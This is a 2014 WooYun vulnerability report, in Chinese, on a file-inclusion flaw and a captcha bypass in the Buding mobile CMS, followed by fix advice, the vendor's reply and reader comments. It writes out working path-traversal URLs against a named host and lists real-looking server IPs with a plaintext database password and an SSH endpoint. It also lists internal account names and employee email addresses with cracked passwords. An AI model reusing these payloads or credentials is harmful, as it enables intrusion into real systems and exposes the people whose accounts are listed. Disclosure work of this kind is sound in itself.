当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083516

漏洞标题:布丁移动任意文件包含|验证码绕过(可获取153万用户密码,已入后台)

相关厂商:创新工场

漏洞作者: lijiejie

提交时间:2014-11-16 20:44

修复时间:2014-11-21 20:46

公开时间:2014-11-21 20:46

漏洞类型:文件包含

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-16: 细节已通知厂商并且等待厂商处理中
2014-11-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

布丁移动一处任意文件包含,验证码可绕过。已进入后台。
可远程连接MySQL(成功4台),泄漏带密文MD5 Hash的用户数据153万。
有手机号,密码,IMEI,MAC等信息。

详细说明:

任意文件包含位于:

http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../../etc/passwd%00.jpg


非root,无法读shadow。首先尝试收集用户名,找到:

root
oper
transfer
luozhaobo
luoxian
lixiaofeng
renfei
wangchunpeng
yangyu
jll
baojuqiang
yuchen
hezheng
chenbingyu
munin
zhouwei
databackup
git
ejbca
gaolei
wangdong
hekunming
wangjun
martin


作为基本思路,收集了用户名列表就可以去破解邮箱了。
因为非root权限,而且是“文件包含”漏洞,所以读php文件中的配置是存在一些困难的。
我逐个用户测试能否读.bash_history文件。功夫不负有心人呐,找到了有权限的用户:

http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../..//home/yangyu/.bash_history%00.jpg


该文件记录了大量敏感信息,运维人员安全意识还不够。。。

漏洞证明:

MySQL数据库:

host = '58.68.234.22', user = 'yangyu', passwd = 'netjava', db = 'martin', charset = 'utf8'
host = '118.192.93.138', port = 3308, db = 'martin',user = 'yangyu', passwd = 'netjava', charset = 'utf8' 可远程连接
host = '223.202.2.206',user = 'yangyu', passwd = 'netjava', db = 'vcar_sumrise', charset = 'utf8' 可远程连接
ssh -p11528 yangyu@223.202.2.37 可远程连接
58.68.234.20 可远程连接


通用密码。。。 连接成功了4台MySQL Server。

buding_MySQL_servers.png


153万用户,有密文:

buding_MySQL.png


应该是公司所有的人吧:

buding_editors.png


我试着插入一个aaa@buding.cn 123456,发现无法登录cms这个后台。基本确定有salt。
然而,后台验证码可绕过进行暴力破解(一次校验后不过期)。
破解出来几枚:

haolu@buding.cn	000000
test@buding.cn 000000
yangyang@buding.cn yangyang
wangjing@buding.cn wangjing
wangdong@buding.cn wangdong


超级管理员:

buding_cms_admin.png


buding_cms_edit.png


后台功能未一一测试了。 ssh也未暴力破解。
后续深入渗透是个体力活,就到这里吧。 :)

修复方案:

1. 参数过滤,解决任意文件包含
2. 验证码使用一次之后必须过期

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-21 20:46

厂商回复:

最新状态:

2014-11-21:真的很抱歉,没有为作者评级上。漏洞已经转交给布丁项目的同学。危害等级是高,哎,真的对不住这位同学,我已经准备去HR领表了,希望得到你的原谅。。。


漏洞评价:

评论

  1. 2014-11-21 20:49 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    无影响666666

  2. 2014-11-21 21:41 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @创新工场 无需太自责,及时处理了漏洞就好。 我了解到的情况是wooyun有短信通知,估计你们填写的号码失效了,所以没收到短信。 Mail的话,如果是公共邮箱,不转发到个人邮件,没看到也属正常。 :)

  3. 2014-11-21 21:52 | g0odnight ( 实习白帽子 | Rank:83 漏洞数:19 | 么么哒,呵呵哒,么蛤蛤~)

    @lijiejie 弱弱问下,这个是布丁的app引起的还是web?厂商貌似把服务关了啊.....

  4. 2014-11-22 12:12 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @g0odnight 既然已经通知到了那肯定得先关了,处理修复后再上线。 这个是web的

  5. 2014-11-22 23:07 | 狮子找女友 ( 路人 | Rank:0 漏洞数:1 | life in security)

    netjava是怎么知道的呢